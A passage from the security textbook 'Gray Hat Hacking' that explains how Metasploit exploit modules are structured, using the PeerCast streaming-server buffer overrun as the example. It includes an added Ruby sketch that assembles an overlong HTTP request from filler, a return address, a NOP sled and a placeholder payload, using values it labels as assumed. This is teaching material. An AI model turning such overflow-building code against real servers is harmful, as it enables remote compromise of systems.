If you're anxious to play with db_autopwn and you don't have or don't want to use the BackTrack CD, you can find a summary of the setup steps at http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html.
Inside Metasploit Modules
We'll be using Metasploit in later chapters as an exploit development platform. While we're here, let's preview the content of one of the simpler Metasploit exploit modules.
PeerCast is a peer-to-peer Internet broadcast platform which, unfortunately, was found in March 2006 to be vulnerable to a buffer overrun. The PeerCast streaming server did not bounds-check an overlong request of the following form, where the query string is roughly 800 bytes of filler:
http://localhost:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)
You can find the Metasploit exploit module for this vulnerability in your Metasploit installation directory under framework\modules\exploits\linux\http\peercast_url.rb.
Each Metasploit exploit module only needs to implement the code specific to triggering the vulnerability. Payload integration, the network connection, and the other lower-level moving parts are handled by the framework. Exploit modules will typically include:
• Name of the exploit and the modules from which it imports or inherits functionality
• Metadata such as name, description, vulnerability reference information, and so on
• Payload information such as number of bytes allowed and characters not allowed
• Target types and any version-specific return address information
• Default transport options such as ports or pipe names
• Ruby code implementing the vulnerability trigger
Gray Hat Hacking: The Ethical Hacker's Handbook, 98
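The following is an added example, not the peercast_url.rb module itself and not framework code: it lays out the pieces listed above (metadata, payload constraints, targets with a return address, default transport options, and the trigger code) in plain Ruby so it runs without a Metasploit installation, and shows the bad-character and space check the framework applies before a payload reaches the module. The payload space, bad-character set, overflow offset and return address are assumed values chosen for illustration, not the real module's.

```ruby
# Added example: a plain-Ruby sketch of a Metasploit exploit module's anatomy.
# NOT the peercast_url.rb module and NOT framework code. Every numeric value
# below (Space, BadChars, OFFSET, Ret) is an assumption for illustration.

EXPLOIT_INFO = {
  'Name'        => 'PeerCast URL Handling Buffer Overflow',
  'Description' => 'Buffer overrun in the PeerCast streaming server ' \
                   'triggered by an overlong /stream/ URL (March 2006).',
  'Platform'    => 'linux',
  'Payload'     => {
    'Space'    => 200,                        # assumed: bytes available for the payload
    'BadChars' => "\x00\x0a\x0d\x20\x3f".b,   # assumed: NUL, LF, CR, space, '?' would cut the URL short
  },
  'Targets'     => [
    # One entry per supported build; the return address is version-specific.
    ['PeerCast (illustrative build)', { 'Ret' => 0x08048aaa }],   # assumed address
  ],
  'DefaultOptions' => { 'RHOST' => 'localhost', 'RPORT' => 7144 }, # port taken from the URL in the text
}

TOTAL_LEN = 800   # overrun length, as in the text's request /stream/?AAAA...(800)
OFFSET    = 476   # assumed: filler bytes before the saved return address is overwritten

# Check the framework performs on a generated payload before the module uses it:
# it must fit in Space and must contain none of BadChars.
def payload_ok?(payload, info = EXPLOIT_INFO)
  spec = info['Payload']
  return false if payload.bytesize > spec['Space']
  bad = spec['BadChars'].bytes
  payload.bytes.none? { |b| bad.include?(b) }
end

# The vulnerability-specific part: lay out the 800-byte overrun as
# filler | return address (little-endian x86) | NOP sled | payload.
def trigger_bytes(payload, target_index = 0, info = EXPLOIT_INFO)
  raise ArgumentError, 'payload too big or contains bad characters' unless payload_ok?(payload, info)
  ret      = [info['Targets'][target_index][1]['Ret']].pack('V')
  sled_len = TOTAL_LEN - OFFSET - ret.bytesize - payload.bytesize
  raise ArgumentError, 'payload does not fit in the overrun' if sled_len < 0
  ('A'.b * OFFSET) + ret + ("\x90".b * sled_len) + payload
end

# Wrap the trigger in the HTTP request the server mishandles. Inside the
# framework a module would hand this to the connection helpers it inherits
# rather than build and send the request itself.
def build_request(payload, target_index = 0, info = EXPLOIT_INFO)
  host = info['DefaultOptions']['RHOST']
  port = info['DefaultOptions']['RPORT']
  "GET /stream/?".b + trigger_bytes(payload, target_index, info) +
    " HTTP/1.0\r\nHost: #{host}:#{port}\r\n\r\n".b
end

# Constructed stand-in for real shellcode: sixteen int3 (0xCC) bytes.
SAMPLE_PAYLOAD = "\xCC".b * 16

if __FILE__ == $0
  req = build_request(SAMPLE_PAYLOAD)
  puts "#{req.bytesize}-byte request, return address at buffer offset #{OFFSET}"
  puts req.unpack1('H*')[0, 64] + '...'
end
```

The split mirrors the division of labour the text describes: `EXPLOIT_INFO` is what a module declares, `payload_ok?` is the kind of check the framework does on the module's behalf, and only `trigger_bytes` contains knowledge of this particular bug.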
The peercast_url.